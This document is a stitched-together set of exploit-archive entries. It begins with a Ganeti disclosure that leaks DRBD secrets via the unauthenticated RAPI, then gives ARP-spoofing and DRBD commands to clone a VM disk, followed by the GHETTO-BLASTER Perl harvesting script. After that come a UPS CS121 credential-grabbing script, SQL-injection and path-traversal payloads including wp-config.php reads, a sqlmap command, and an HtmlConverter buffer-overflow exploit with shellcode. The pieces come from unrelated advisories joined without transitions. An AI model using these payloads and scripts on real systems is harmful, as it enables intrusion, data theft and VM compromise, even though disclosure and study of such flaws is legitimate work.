2-jobs-215  2-jobs-248  2-jobs-280  2-jobs-43   2-jobs-76
2-jobs-119                               2-jobs-151  2-jobs-184
2-jobs-216  2-jobs-249  2-jobs-281  2-jobs-44   2-jobs-77
2-jobs-12                                2-jobs-152  2-jobs-185
2-jobs-217  2-jobs-25   2-jobs-282  2-jobs-45   2-jobs-78
2-jobs-120                               2-jobs-153  2-jobs-186
2-jobs-218  2-jobs-250  2-jobs-283  2-jobs-46   2-jobs-79


Files contain DRBD secrets:

user@kali:~$ grep secret *|tail -n 5
2-jobs-80:
                        'secret' =>
'eb1fe92b20aef58ed0570df49a38f82cf5a72d06'
2-jobs-82:
            'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06'
2-jobs-84:
            'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
2-jobs-85:
            'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
2-jobs-86:
            'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
user@kali:~$



The key is confirmed by using `drbdsetup show` as root in the Ganeti
master node:

root@debian-01:~# drbdsetup show
resource resource0 {
    options {
    }
    net {
        cram-hmac-alg           "md5";
        shared-secret           "eb1fe92b20aef58ed0570df49a38f82cf5a72d06";
        after-sb-0pri           discard-zero-changes;
        after-sb-1pri           consensus;
    }
    _remote_host {
        address                 ipv4 10.105.1.201:11000;
    }
    _this_host {
        address                 ipv4 10.105.1.200:11000;
        volume 0 {
            device                      minor 0;
            disk                        "/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data";
            meta-disk                   "/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta";
            disk {
                size                    8388608s; # bytes
                resync-rate             61440k; # bytes/second
            }
        }
    }
}
root@debian-01:~#


By digging further, one of the job files (2-jobs-280) contains the DRBD
configuration:

[...]

      'drbd_info' => {
                       'port' => 11000,
                       'primary_minor' => 0,
                       'secondary_node' => 'debian-02',
                       'secondary_minor' => 0,
                       'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
                       'primary_node' => 'debian-01'
                     },
[...]



As stated in http://docs.ganeti.org/ganeti/current/html/security.html:

  DRBD connections are protected from erroneous connections to other
  machines (as may happen due to software issues), and from accepting
  connections from other machines, by using a shared secret, exchanged
  via RPC requests from the master to the nodes when configuring the
  device.


We recovered the DRBD secret, the port used and the node names without
authentication.
Other files contain the LVM VG and LV names! That is enough to start
playing with DRBD from the attacker's side.



III. DRBD Madness

Now, it's time for DRBD Feng Shui!

Getting the File System of a VM:

o By doing ARP spoofing in the same LAN:

We will impersonate 10.105.1.201 by doing ARP poisoning and using a
valid drbd.conf, thanks to the parameters provided by the RAPI daemon:

root@kali# cat etc-drbd.conf

include "drbd.d/global_common.conf";
include "drbd.d/*.res";

resource resource0 {
    volume 0 {
       device minor 0;
       disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data";
       meta-disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta";
    }
    protocol C;
    net {
        cram-hmac-alg           "md5";
        shared-secret           "eb1fe92b20aef58ed0570df49a38f82cf5a72d06";
        after-sb-0pri           discard-zero-changes;
        after-sb-1pri           consensus;
    }
    on target {
        address    10.105.1.200:11000;
    }
    on kali {
        address    10.105.1.201:11000;
    }
}

root@kali# vgremove xenvg-vg 2>/dev/null
root@kali# dd if=/dev/zero of=/dev/sdb bs=1024 count=1024
root@kali# pvcreate /dev/sdb
root@kali# vgcreate xenvg-vg /dev/sdb
root@kali# lvcreate --name
41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data --size 4G xenvg-vg
root@kali# lvcreate --name
41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta --size 128M xenvg-vg
root@kali# cp etc-drbd.conf /etc/drbd.conf
root@kali# drbdadm create-md resource0
root@kali# drbdadm up resource0

<ARP poisoning> || root@kali# ifconfig eth0 10.105.1.201 netmask 255.255.255.0

root@kali# drbdadm attach resource0
root@kali# drbdadm connect resource0
root@kali# cat /proc/drbd
version: 8.4.3 (api:1/proto:86-101)
srcversion: 1A9F77B1CA5FF92235C2213
 0: cs:SyncTarget ro:Secondary/Primary ds:Inconsistent/UpToDate C r-----
    ns:0 nr:916568 dw:916472 dr:0 al:0 bm:55 lo:2 pe:0 ua:2 ap:0 ep:1
wo:f oos:3277832
        [===>................] sync'ed: 22.0% (3277832/4194304)K
        finish: 0:08:33 speed: 6,368 (5,912) want: 4,520 K/sec
root@kali# echo "wow synchronisation in progress !"
wow synchronisation in progress !
root@kali#

After 10 minutes of synchronisation, an attacker has a perfect copy
of the targeted VM's file system, obtained through DRBD replication.

It's also possible to write to the file system (for example, adding
SSH keys).
Rooting VMs by adding SSH keys and by doing s/PermitRootLogin
No/PermitRootLogin Yes/ is left as an exercise for the reader.


o Other methods of MiTM exist and are left as an exercise for the reader.



## Proposed Workarounds by the Security Researcher

As a first step, I think the following must be done to improve the security of Ganeti:

1/ Forcing the RAPI daemon to listen on 127.0.0.1 instead of 0.0.0.0.

  This can be done by shipping the following by default in /etc/default/ganeti:

  RAPI_ARGS="-b 127.0.0.1"

  Making ganeti-mond listen on 127.0.0.1 is a good step too (it
listens on 0.0.0.0:1815/tcp).


2/ Requiring authentication by default for the RAPI daemon (not only
for write access but for read access too).


3/ Filtering the output of jobs to avoid leaking secrets.

  Note that the immediate step is to change the secrets used for DRBD and
  to make sure nobody had access to the DRBD blocks, which would allow a
compromise of all the VMs.

4/ Disabling SSL renegotiation and updating the default ciphers.


A personal note: as deploying a working Ganeti platform is very complicated,
attackers will likely give up before having a working Ganeti
platform to study :)
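Workaround 1 is a bind-address change, and the check a practitioner wants is whether a node actually applied it. The following is an added example, not part of the advisory or of Ganeti, that audits the two daemons named above from a node's /etc/default/ganeti and its `ss -ltn` output. Both inputs are constructed here. The RAPI_ARGS variable and the 5080/1815 ports come from the advisory; the MOND_ARGS name and ganeti-mond accepting `-b` like ganeti-rapi are assumptions of this example.

```python
"""Audit the ganeti-rapi / ganeti-mond bind addresses (added example)."""
import re
import shlex

RAPI_PORT = 5080   # ganeti-rapi default port (from the advisory)
MOND_PORT = 1815   # ganeti-mond default port (from the advisory)
WILDCARDS = {'0.0.0.0', '*', '::', '[::]'}

# Constructed sample of /etc/default/ganeti as shipped: no bind restriction.
DEFAULT_GANETI_WEAK = """
# Ganeti daemon options
NODED_ARGS=""
RAPI_ARGS=""
"""

# Constructed sample with the workaround applied. MOND_ARGS is an assumption:
# the advisory only states RAPI_ARGS.
DEFAULT_GANETI_FIXED = """
NODED_ARGS=""
RAPI_ARGS="-b 127.0.0.1"
MOND_ARGS="-b 127.0.0.1"
"""

# Constructed `ss -ltn` output from a node running the shipped defaults.
SS_WEAK = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    0.0.0.0:5080        0.0.0.0:*
LISTEN 0      128    0.0.0.0:1815        0.0.0.0:*
LISTEN 0      128    127.0.0.1:1811      0.0.0.0:*
"""

# Constructed `ss -ltn` output after restarting both daemons with -b 127.0.0.1.
SS_FIXED = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:5080      0.0.0.0:*
LISTEN 0      128    127.0.0.1:1815      0.0.0.0:*
"""

_ASSIGN = re.compile(r'^\s*([A-Z_]+)=(.*)$')


def parse_default_ganeti(text):
    """Return {VAR: value} for simple VAR="..." lines; quotes are removed as a shell would."""
    env = {}
    for line in text.splitlines():
        m = _ASSIGN.match(line)
        if not m:
            continue
        env[m.group(1)] = ' '.join(shlex.split(m.group(2).strip()))
    return env


def bind_address(args):
    """Address given to -b / --bind in a daemon argument string; None means daemon default."""
    toks = shlex.split(args or '')
    for i, tok in enumerate(toks):
        if tok.startswith('--bind='):
            return tok.split('=', 1)[1]
        if tok in ('-b', '--bind') and i + 1 < len(toks):
            return toks[i + 1]
    return None


def parse_listeners(ss_output):
    """Return {(addr, port)} for every LISTEN line of `ss -ltn` output."""
    listeners = set()
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] != 'LISTEN':
            continue
        addr, _, port = parts[3].rpartition(':')
        listeners.add((addr, int(port)))
    return listeners


def audit(default_text, ss_output):
    """List findings for both daemons; an empty list means both are loopback-only."""
    env = parse_default_ganeti(default_text)
    listeners = parse_listeners(ss_output)
    findings = []
    for name, var, port in (('ganeti-rapi', 'RAPI_ARGS', RAPI_PORT),
                            ('ganeti-mond', 'MOND_ARGS', MOND_PORT)):
        configured = bind_address(env.get(var))
        if configured != '127.0.0.1':
            findings.append('%s: %s does not bind to 127.0.0.1 (got %r)'
                            % (name, var, configured))
        for addr, p in sorted(listeners):
            if p == port and addr in WILDCARDS:
                findings.append('%s: socket bound to %s:%d, reachable from the network'
                                % (name, addr, p))
    return findings


if __name__ == '__main__':
    for label, cfg, ss in (('weak', DEFAULT_GANETI_WEAK, SS_WEAK),
                           ('fixed', DEFAULT_GANETI_FIXED, SS_FIXED)):
        print(label, audit(cfg, ss) or 'ok')
```

The configuration check and the socket check are deliberately separate: a correct RAPI_ARGS line with a daemon that was never restarted still shows a wildcard listener, and that is the state that matters to an attacker on the network.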



## Vendor Response

Update to the latest version of Ganeti.

Read details about mitigation measures here:
https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg



## Report Timeline

 * Jul 30, 2015: Pierre Kim sends an email to security@ganeti.org
asking for a GPG key; the email bounces
 * Jul 30, 2015: Pierre Kim asks the Google Security Team whether Ganeti is
eligible for the Google Vulnerability Reward Program
 * Jul 30, 2015: Pierre Kim sends an email to the Ganeti Team asking for a
working security contact
 * Jul 30, 2015: Guido Trotter replies, saying to use
opensource-ganeti@google.com
 * Aug 1, 2015: security@google.com confirms it is out of scope
 * Aug 4, 2015: Pierre Kim says the exploits are critical and that Ganeti
is widely used by Google
 * Aug 11, 2015: Advisories and PoC sent to the Google Security Team;
Pierre Kim asks the Google Security Team to contact Riseup, as they are
using Ganeti
 * Aug 12, 2015: Google Security Team transmits the information to the Ganeti Team
 * Aug 20, 2015: Google Security Team is working on the scope and the
impact of the report
 * Aug 27, 2015: Google Security Team decides the report is not within scope of
the VRP, but a research grant is awarded as "Security
improvement efficacy research"
 * Aug 28, 2015: Pierre Kim provides information about DRBDv8 and
DRBDv9, asks for information about the DoS and the conditions for
the reward, and asks whether Riseup was contacted
 * Sep 10, 2015: Google Security Team confirms they will not contact
Riseup and asks "that you act and communicate in good faith,
use your own best judgement, and we'll do everything we can to work
with you to resolve vulnerabilities in a reasonable timeframe"
 * Oct 6, 2015: Pierre Kim asks for an update about the security patches
and informs them he will contact Riseup
 * Oct 6, 2015: Riseup is contacted
 * Oct 16, 2015: Google Security Team confirms releases at the end of October
and asks about CVEs from MITRE. Ganeti Bug #1135 is created
 * Oct 17, 2015: Pierre Kim asks Google to request CVE assignments from MITRE
and proposes to contact CNNVD to get a CNNVD entry
 * Oct 17, 2015: Google Security Team contacts MITRE to get CVEs
 * Oct 23, 2015: Google Security Team has 2 CVEs: CVE-2015-7944 and CVE-2015-7945
 * Nov 3, 2015: Pierre Kim reports a new security issue, a DoS through
job creation
 * Nov 5, 2015: Ganeti Team rate-limits job creation to 20 concurrent
jobs, which limits the problem, and states that the patch will come very
soon
 * Nov 17, 2015: Ganeti Team announces new releases for the following week
 * Nov 23, 2015: A pre-advisory is sent to the Ganeti Team and the Google Security Team
 * Dec 30, 2015: Ganeti Team releases a security advisory
 * Jan 05, 2016: A public advisory is sent to security mailing lists



## Credit

These vulnerabilities were found by Pierre Kim (@PierreKimSec).



## Greetings

Big thanks to my friends Alexandre Torres, Jordan, Jerome and Stephen.

Thanks to Google Security Team which coordinated the issues by
contacting MITRE and the different parties.



## References

https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt
https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html
http://www.ocert.org/advisories/ocert-2015-012.html
https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg



## PoC - GHETTO-BLASTER
=end

#!/usr/bin/perl -w

use LWP::UserAgent;
use JSON;
use Data::Dumper;
use strict;
use warnings;

my $i_want_readable_json = 1;

if (!(defined($ARGV[0])))
{
  print "$0 http://<ip_of_ganeti_rapi>\n\n";
  print "  Example:\n";
  print "    https://<ip>\n";
} else {
  print "GHETTO-BLASTER - a Ganeti data aggregation tool\n";
}
print "\n";
print "  2015 Pierre Kim <pierre.kim.sec\@gmail.com>\n";
print "       \@PierreKimSec https://pierrekim.github.io/\n";
print "  DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE <http://www.wtfpl.net/txt/copying/>\n\n";
exit (1) if (!(defined($ARGV[0])));

my $base_url          = $ARGV[0];
my $default_rapi_port = 5080;
my $default_mond_port = 1815;

my %basic_cmds = (
  "info" =>     { "url" => "/2/info",     "output_file" => "2-info",      "is_json" => 1 },
  "version" =>  { "url" => "/version",    "output_file" => "version",     "is_json" => 0 },
  "features" => { "url" => "/2/features", "output_file" => "2-features",  "is_json" => 1 },
  "os" =>       { "url" => "/2/os",       "output_file" => "2-os",        "is_json" => 0 }
);

$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;



# FIXME:
# /2/filters
# /2/filters?bulk=1
# /2/groups/tags
# /2/instances/[instance_name]/tags
# /2/nodes/tags
# /2/tags
# /2/networks/[network_name]/tags
#

# TO TEST:
# /2/groups/[group_name]
# /2/networks/[network_name]


&main();


sub main()
{
  &greetings("You are being visited by GHETTO-BLASTER a Ganeti data aggregation tool");

  for my $cmd (keys %basic_cmds)
  {
    my $res = &get_target($base_url . ":" . $default_rapi_port . $basic_cmds{$cmd}->{"url"});
    &save_data_leak($res, $basic_cmds{$cmd}->{"output_file"}, $basic_cmds{$cmd}->{"is_json"});
  }

  &parse_instances();
  &parse_networks();
  &parse_groups();
  &parse_nodes();
  &parse_mond();
  &parse_jobs();
  &greetings("Thank you for using Ganeti and have a nice day!");
}


sub greetings()
{
  my $msg = $_[0];

  $msg =~ s/ /_/g;
  print "Sending Banner to the remote API Daemon: $msg\n";
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/" . $msg, 1);
}


sub parse_mond()
{
  my $res;
  my $base_url_http = $base_url;

  $base_url_http =~ s/https/http/;
  
  $res = &get_target($base_url_http . ":" . $default_mond_port . "/1/list/collectors");
  &save_data_leak($res, "1-list-collectors", 0);
  $res = &get_target($base_url_http . ":" . $default_mond_port . "/1/report/all");
  &save_data_leak($res, "1-report-all", 0);
}


sub parse_instances()
{
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/instances");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-instances", 1);

  foreach my $data (@{$decoded_json})
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
    &save_data_leak($res, "2-instances-$data->{'id'}", 1, $data->{'id'});

    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'} . "/info");
    print "Sleep (10) because job is in progress ...\n";
    sleep 10; # we need to sleep(10) when asking the instances/info due to the creation of a job
    $res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs/" . $res);
    &save_data_leak($res, "2-instances-$data->{'id'}-info-jobs", 1, "2/instances/$data->{'id'}/info-jobs");
  }
}


sub parse_networks()
{
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/networks");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-networks", 1);

  foreach my $data (@{$decoded_json})
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
    &save_data_leak($res, "2-networks-$data->{'name'}", 1, $data->{'uri'});
  }
}


sub parse_groups()
{
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/groups");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-groups", 1);

  foreach my $data (@{$decoded_json})
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
    &save_data_leak($res, "2-groups-$data->{'name'}", 1, $data->{'uri'});
  }
}


sub parse_nodes()
{
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/nodes");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-nodes", 1);

  foreach my $data (@{$decoded_json})
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
    &save_data_leak($res, "2-nodes-$data->{'id'}", 1, $data->{'id'});

    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'} . "/role");
    &save_data_leak($res, "2-nodes-$data->{'id'}-role", 0, "nodes/$data->{'id'}-role");
  }
}


sub parse_jobs()
{
  my $total_jobs = 0;
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-jobs", 1);

  foreach my $data (@{$decoded_json})
  {
    $total_jobs = $data->{'id'} if ($data->{'id'} > $total_jobs);
  }

  for my $i (0 .. $total_jobs)
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs/" . $i);
    &save_data_leak($res, "2-jobs-$i", 1);
  }
}


sub save_data_leak()
{
  my $input = $_[0];
  my $output_file = $_[1];
  my $is_json = $_[2];
  my $stdout = $_[3] || $output_file;
  my $json;

  print "Parsing $stdout ... saving to $output_file\n";
  $input = Dumper(JSON::decode_json($input)) if ($i_want_readable_json && $is_json);
  open (my $fh, ">", $output_file) or die "cannot write $output_file: $!\n";
  print $fh ($input);
  close ($fh);
}


sub get_target()
{
  my $target = $_[0];
  my $error_ok = $_[1];
  my ($ua, $res, $req);

  $ua = LWP::UserAgent->new(
    ssl_opts => { verify_hostname => 0, SSL_verify_mode => 0 }
  );
  $ua->agent("Ganeti/2.12");
  $ua->env_proxy;
  $ua->timeout(10);
  $req = new HTTP::Request GET => $target;
  $res = $ua->request($req);

  print "Error when requesting $target\n" if (!$res->is_success && !$error_ok);

  return ($res->content);
}


=begin
## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/


-- 
Pierre Kim
pierre.kim.sec@gmail.com
@PierreKimSec
=end
            
source: https://www.securityfocus.com/bid/67438/info

UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.

Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service. 

#!/usr/bin/perl -w
use strict;
use IO::Socket;
use constant MAXBYTES => scalar 1024;

die "usage: $0 <ip of CS121 adapter>\n" unless defined $ARGV[0];

my $inline;
my $socket = IO::Socket::INET->new( PeerPort  => 4000,
                                    PeerAddr  => $ARGV[0],
                                    Type      => SOCK_DGRAM,
                                    Proto     => 'udp')
    or die "cannot create UDP socket: $!\n";

# banner and system parameters are returned without any authentication
$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n";

$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

# the same unauthenticated channel accepts file-system commands;
# ftp_accounts.txt in /flash holds the account credentials
print "Searching login\n";
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt");

while ($socket->recv($inline, MAXBYTES)) {
	if ($inline =~ /admin/ig) { print $inline; exit; }
}

sleep(1);
            
source: https://www.securityfocus.com/bid/67442/info

CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection] 
            
source: https://www.securityfocus.com/bid/67460/info

Glossaire module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Glossaire 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION] 
            
source: https://www.securityfocus.com/bid/67465/info

SMART iPBX is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/editarclave.php?accion=e&id=[SQL INJECTION]&ld=1 
            
source: https://www.securityfocus.com/bid/69278/info

WP Content Source Control plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

WP Content Source Control 3.0.0 is vulnerable; other versions may also be affected. 

www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php 
            
source: https://www.securityfocus.com/bid/69089/info

The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

wpSS 0.62 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4# 
            
source: https://www.securityfocus.com/bid/69105/info

The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

HDW Player 2.4.2 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12 
            
source: https://www.securityfocus.com/bid/69109/info

VoipSwitch is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 

https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg 
            
source: https://www.securityfocus.com/bid/69181/info

The GB Gallery Slideshow plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

GB Gallery Slideshow 1.5 is vulnerable; other versions may also be affected. 

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.67
Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
Pragma: no-cache
Cache-control: no-cache,no-store
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 120
Connection: close

action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]


Exploit via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://www.example.com/wp-admin/admin-ajax.php" \
--data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql 

---
Place: POST
Parameter: selected_group
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
            
source: https://www.securityfocus.com/bid/69222/info

FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users-- 
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt


Vendor:
===============
www.oracle.com


Product:
========================================
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50


The HTML Converter (HtmlConverter.exe) is a binary shipped with the JDK that
allows web page authors to explicitly target the browsers and platforms used
in their environment when modifying their pages.



Vulnerability Type:
============================
Buffer Overflow


CVE Reference:
==============
N/A



Vulnerability Details:
=====================

Calling HtmlConverter.exe with a specially crafted argument causes a stack
buffer overflow that allows execution of arbitrary attacker-supplied code.
This was a small vulnerability included as part of the overall Oracle CPU
released on January 19, 2016.

Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html



registers ...

EAX FFFFFFFE
ECX FFFFFFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 00001DB1
EDI 00000000
EIP 52525252                          <-------- "RRRR" \x52
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0



Exploit code(s):
===============

import struct
import subprocess

###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
#EIP @ 2493
pgm="C:\\Program Files (x86)\\Java\\jdk160_24\\bin\\HtmlConverter.exe "
#EIP 2469 - 2479

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#JMP ESP kernel32.dll (Windows 7 SP1 address, little-endian)
rp=struct.pack('<L', 0x76E72E2B)


# 2469 bytes of padding reach the saved return address, which is overwritten
# with the JMP ESP address so that execution lands in the NOP sled and then
# in the shellcode that follows it
payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)


Disclosure Timeline:
=====================================
Vendor Notification: August 28, 2015
January 20, 2016  : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
===============
Medium



Description:
=============================================================

Vulnerable Product:     [+] Java SE 6 U24 HtmlConverter.exe

=============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
            
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: xwpe - Windows Editor v1.5.30a-2.1
# Description: Programming environment and editor for console and X11
# Tested and developed on:  Kali Linux 2.0 x86 - https://www.kali.org
#
# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
# overflow vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.identicalsoftware.com/xwpe
# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
# MD5: 793a89f7df892c7934be6c2353a6f0f9
#
#gdb$ run $(python -c 'print "\x90" * 290  + "DCBA"')
#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290  + "DCBA"')
#sh: 1: /usr/sbin/gpm: not found
#
#  ESI: 0x41414141  EDI: 0x41414141  EBP: 0x41414141  ESP: 0xBFFFF370  EIP: 0x42434441
#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
#Error while running hook_stop:
#Cannot access memory at address 0x42434441
#0x42434441 in ?? ()
#gdb$ backtrace
#0  0x42434441 in ?? ()
#1  0x4f4e2041 in ?? ()
#2  0x61732054 in ?? ()
#3  0x21646576 in ?? ()
#4  0x206f440a in ?? ()
#5  0x20756f79 in ?? ()
#6  0x746e6177 in ?? ()
#7  0x206f7420 in ?? ()
#8  0x65766173 in ?? ()
#9  0x6c694620 in ?? ()
#10 0x003f2065 in ?? ()
#11 0x00000088 in ?? ()
#12 0x00000132 in ?? ()
#13 0x00000006 in ?? ()
#14 0x00002710 in ?? ()
#15 0x0000009a in ?? ()
#16 0xfac9bc00 in ?? ()
#17 0x00000098 in ?? ()
#18 0x00000011 in ?? ()
#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
